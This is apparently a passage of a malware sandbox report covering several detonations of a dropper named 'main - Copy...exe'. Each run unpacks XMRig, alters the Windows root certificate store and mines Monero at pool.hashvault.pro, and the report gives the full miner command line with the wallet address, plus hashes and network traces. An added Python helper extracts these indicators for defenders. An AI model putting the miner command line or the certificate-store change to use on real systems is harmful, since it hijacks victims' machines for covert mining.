US 8.8.8.8:53 chromewebstore.googleapis.com udp
DE 142.250.186.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.242.123.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
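The two durable pieces of this record are the miner command line and the network table. The script below, an added example rather than sandbox output, pulls the pool, wallet, TLS pinning and the direct connections out of them; the command line and the table rows are copied from the behavioral17 record above, while the helper names, the partial list of value-less xmrig flags and the list of background domains are my own assumptions.

```python
"""Extract the durable indicators from one detonation record: the miner
command line and the sandbox network table. Added example, not sandbox code."""
import re

# Command line verbatim from the Processes section above (raw string: backslash).
XMRIG_CMDLINE = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user "
    "46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls --tls-fingerprint "
    "420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Rows copied from the Network table above (Country Destination Domain Proto).
# "NL 52.142.223.178:80 tcp" is recorded without a domain, as in the report.
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
DE 142.250.186.74:443 chromewebstore.googleapis.com tcp
NL 52.142.223.178:80 tcp
"""

# xmrig options that take no value (partial list, an assumption); everything
# else is treated as key/value. Enough for the command line in this report.
BOOLEAN_FLAGS = {"--tls", "--background", "--keepalive", "--nicehash",
                 "--no-huge-pages", "--no-color", "--dry-run"}

# Domains the analysis VM's own Edge/Windows components talk to (assumption,
# tune for your sandbox); they are tagged, not dropped.
BACKGROUND_DOMAINS = ("chromewebstore.googleapis.com", "www.bing.com", "g.bing.com")

# Monero addresses: base58 without 0/O/I/l; standard 95 chars starting with 4,
# subaddress 95 chars starting with 8, integrated 106 chars starting with 4.
_B58 = "[1-9A-HJ-NP-Za-km-z]"
_MONERO_ADDR = re.compile(r"4%s{94}|8%s{94}|4%s{105}" % (_B58, _B58, _B58))


def is_monero_address(s):
    return bool(_MONERO_ADDR.fullmatch(s or ""))


def parse_xmrig_cmdline(cmdline):
    """Split a recorded xmrig command line into the fields worth keeping."""
    argv = cmdline.split()                  # no quoted arguments in this sample
    if not argv:
        raise ValueError("empty command line")
    opts, i = {}, 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--"):
            key, _, val = tok[2:].partition("=")
            takes_value = tok not in BOOLEAN_FLAGS and not val
            if takes_value and i + 1 < len(argv) and not argv[i + 1].startswith("--"):
                val, i = argv[i + 1], i + 1
            opts[key] = val if val else True
        i += 1
    url = opts.get("url") or ""
    host, sep, port = url.rpartition(":")
    if not sep:                             # bare host with no port
        host, port = url, ""
    return {
        "exe": argv[0],
        "pool_host": host or None,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": opts.get("user"),
        "wallet_valid": is_monero_address(opts.get("user")),
        "password": opts.get("pass"),
        "donate_level": opts.get("donate-level"),
        "tls": opts.get("tls") is True,
        "tls_fingerprint": opts.get("tls-fingerprint"),
    }


def extract_network_iocs(rows):
    """Return the names queried and the direct connections, dropping reverse
    (in-addr.arpa) lookups and tagging known background traffic."""
    dns, connections = set(), []
    for line in rows.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:               # row recorded with no domain
            (country, dest, proto), domain = parts, ""
        else:
            continue
        if domain.endswith(".in-addr.arpa"):
            continue
        ip, _, port = dest.rpartition(":")
        if port == "53":
            dns.add(domain)
        else:
            connections.append({
                "country": country, "ip": ip,
                "port": int(port) if port.isdigit() else None,
                "domain": domain, "proto": proto,
                "background": domain in BACKGROUND_DOMAINS,
            })
    return {"dns": dns, "connections": connections}


if __name__ == "__main__":
    import json
    print(json.dumps(parse_xmrig_cmdline(XMRIG_CMDLINE), indent=2))
    net = extract_network_iocs(NETWORK_ROWS)
    print(sorted(net["dns"]))
    for conn in net["connections"]:
        print(conn)
```

The wallet check is a format check only (alphabet, length, leading character); it tells you the string is shaped like a Monero address, not that it is funded or belongs to this campaign. The connection list keeps the domain-less row rather than dropping it, since a TCP/80 connection with no name resolution is exactly the kind of row worth a second look.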

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Memory dumps for PID 1704 (file names follow memory/1704-<index>-<region>-memory.dmp)

Index Region
16 0x000001973AB30000-0x000001973AB50000
17 0x000001973C340000-0x000001973C360000
18, 19, 22, 23, 26-84 0x00007FF74F6E0000-0x00007FF7501E3000
20, 24 0x000001973C380000-0x000001973C3A0000
21, 25 0x000001973C360000-0x000001973C380000

The 0x00007FF74F6E0000 region is 0xB03000 bytes (about 11 MiB) at a typical x64 image base and is dumped 63 times; the other four are 0x20000-byte (128 KiB) regions.

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:40

Platform

win10v2004-20240508-en

Max time kernel

1550s

Max time network

1563s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Network

Country Destination Domain Proto
US 23.53.113.159:80 tcp
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:30

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1809s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all reported without description, indicator, process or target (the sandbox matched the payload signature but exposes no per-hit detail)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Memory dumps for PID 452 (file names follow memory/452-<index>-<region>-memory.dmp)

Index Region
14 0x0000028AFF0D0000-0x0000028AFF0F0000
15 0x0000028AFF710000-0x0000028AFF730000
16, 17, 20, 21, 24-82 0x00007FF604490000-0x00007FF604F93000
18, 22 0x0000028AFF730000-0x0000028AFF750000
19, 23 0x0000028AFF750000-0x0000028AFF770000

The 0x00007FF604490000 region is 0xB03000 bytes (about 11 MiB) at a typical x64 image base and is dumped 63 times; the other four are 0x20000-byte (128 KiB) regions.

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:34

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all reported without description, indicator, process or target (the sandbox matched the payload signature but exposes no per-hit detail)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Memory dumps for PID 3540 (file names follow memory/3540-<index>-<region>-memory.dmp)

Index Region
14 0x00000255AE790000-0x00000255AE7B0000
15 0x00000255AE7E0000-0x00000255AE800000
16, 17, 20, 21, 24-82 0x00007FF7A1E50000-0x00007FF7A2953000
18, 22 0x00000255AE820000-0x00000255AE840000
19, 23 0x00000255AE800000-0x00000255AE820000

The 0x00007FF7A1E50000 region is 0xB03000 bytes (about 11 MiB) at a typical x64 image base and is dumped 63 times; the other four are 0x20000-byte (128 KiB) regions.

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:38

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all reported without description, indicator, process or target (the sandbox matched the payload signature but exposes no per-hit detail)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783
a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4568-14-0x000001DFBC3A0000-0x000001DFBC3C0000-memory.dmp

memory/4568-15-0x000001DFBC700000-0x000001DFBC720000-memory.dmp

memory/4568-16-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-17-0x000001E0508C0000-0x000001E0508E0000-memory.dmp

memory/4568-18-0x000001E050690000-0x000001E0506B0000-memory.dmp

memory/4568-19-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-20-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-23-0x000001E050690000-0x000001E0506B0000-memory.dmp

memory/4568-22-0x000001E0508C0000-0x000001E0508E0000-memory.dmp

memory/4568-21-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-24-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-25-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-26-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-27-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-28-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-29-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-30-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-31-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-32-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-33-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-34-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-35-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-36-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-37-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-38-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-39-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-40-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-41-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-42-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-43-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-44-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-45-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-46-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-47-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-48-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-49-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-50-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-51-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-52-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-53-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-54-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-55-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-56-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-57-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-58-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-59-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-60-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-61-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-62-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-63-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-64-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-65-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-66-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-67-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-68-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-69-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-70-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-71-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-72-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-73-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-74-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-75-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-76-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-77-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-78-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-79-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-80-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-81-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-82-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:32

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

